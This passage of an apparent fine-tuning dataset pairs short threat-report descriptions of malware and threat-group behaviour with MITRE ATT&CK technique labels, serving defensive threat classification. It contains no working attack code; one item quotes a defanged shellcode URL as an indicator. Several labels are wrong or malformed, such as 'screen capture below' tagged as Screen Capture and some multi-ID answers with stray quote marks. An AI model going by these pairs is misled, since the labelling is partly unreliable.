- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sends phishing mail to given recipients and receives user’s access token using device code authentication flow"
- },
- {
- "role": "assistant",
- "content": "T1528 - Steal Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT can inject itself into processes like wermgr.exe"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos uses Python scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type has temporarily stored collected information to the files `“%AppData%\\{Unique Identifier}\\HOSTRURKLSR”` and `“%AppData%\\{Unique Identifier}\\NEWERSSEMP”`."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Network analysis — run one of the plugins to retrieve Active Directory and network information (Fig"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used VBScript and JavaScript files to execute its payload."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 has created services to appear as benign system tools."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has interacted with compromised systems to browse and copy files through its graphical user interface in sessions."
- },
- {
- "role": "assistant",
- "content": "T1061 - Graphical User Interface"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A VBA Macro sets its file attributes to System and Hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The assembly code used to create the shellcode can be obtained from: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm The purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL “hxxp://45.76.128[.]165:4443/0w0O6”"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has leveraged dynamic DNS providers for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first backdoor that the TeleBots group relied heavily on was Python/TeleBot.A, which was rewritten from Python in the Rust programming language. The functionality remains the same: it is a standard backdoor that uses the Telegram Bot API in order to receive commands from, and send responses to, the malware operator"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SQLRat relies on users clicking on an embedded image to execute the scripts."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type has used `cmd.exe` to run commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first 11 bytes of the received buffer are encrypted with the XOR algorithm"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner can steal saved usernames and passwords in Chrome as well as credit card credentials."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "3, 2019): On May 16, 2019 FireEye's Advanced Practices team attributed the remaining \"suspected APT33 activity\" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Custom Backdoor: POWERTON . POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The code injected into an msiexec.exe sends a beacon signal to the CnC server and awaits commands"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu uses DNS for the C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK encrypts C2 communications with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard has the ability to create a new process using `rundll32`."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "3PARA RAT has a command to set certain attributes such as creation/modification timestamps on files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decoding and decrypting with the XOR key “DARKMATTER” it gets the real C&C URL ‘banhamm.com‘."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist has exfiltrated data over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has a component to check for running processes to look for web browsers."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to communicate over a backup channel via plus.google.com."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The core component will check whether it is located in the %temp%\\[appname] directory, otherwise it copies itself to %temp%\\[appname]\\[appname] and set the file attribute to hidden"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and—in most cases—most effective method, uses a modified version of the Mimikatz tool to steal the user’s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee’s system, they gained access to the e-commerce company's internal network. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. Based on Suckfly scanning for common ports, it’s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter — the Linux kernel firewall — using the iptc_insert_entry() function from libiptc1 to allow output communication to it"
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has routed their traffic through an external server in order to obfuscate their location."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can enumerate antivirus software on the target."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Executive summary . The PROMETHIUM threat actor — active since 2012 — has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny's dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This shortcut file points to the path of the previously written ‘Applet.cpl’ file"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Volgmer variants use SSL to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Sharpshooter, threat actors installed Rising Sun in the Startup folder and disguised it as `mssync.exe`."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can download its second stage from a hardcoded URL within the loader's code."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used a batch script to gather folder and file names from victim hosts."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz has the ability to steal credentials from web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has been executed using `rundll32.exe`."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The screen capture below shows the decryption function.It then calls the StartAndPatchRegAsm function.This function tries to find the original Microsoft RegAsm executable path"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "removes batch files to reduce fingerprint on the system as well as deletes the CAB file that gets encoded upon infection."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate has used the `ExitWindowsEx` API to flush file buffers to disk and stop running processes."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell has the ability to modify file permissions."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy has a module that checks a number of indicators on the system to determine if its running on a virtual machine."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdating, or timestomping, is a technique used by many threat actors which involves the manipulation of the creation timestamps or compilation date of a file in order to thwart analysis attempts (anti-forensics). It is suspected that the creation date of most of the files mentioned in this report were tampered with by the threat actors and backdated to 2016"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer can establish persistence by creating a .lnk file in the Start menu."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BRONZE BUTLER uploader or malware the uploader uses \"command\" to delete the RAR archives after they have been exfiltrated."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SamSam uses custom batch scripts to execute some of its components."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will sleep until after a date/time value loaded from a .dat file has passed. This allows the RAT to remain dormant until a set date, which could allow a means to regain access if other parts of the actors' toolset are removed from a victim."
- },
- {
- "role": "assistant",
- "content": "T1108 - Redundant Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ran genuinely-signed executables from Symantec and McAfee which loaded a malicious DLL called rastls.dll."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail can be delivered as a compressed, encrypted, and encoded payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Threat Group-3390 tool can read and decrypt stored Registry values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used PowerShell scripts to download and execute programs in memory, without writing to disk."
- },
- {
- "role": "assistant",
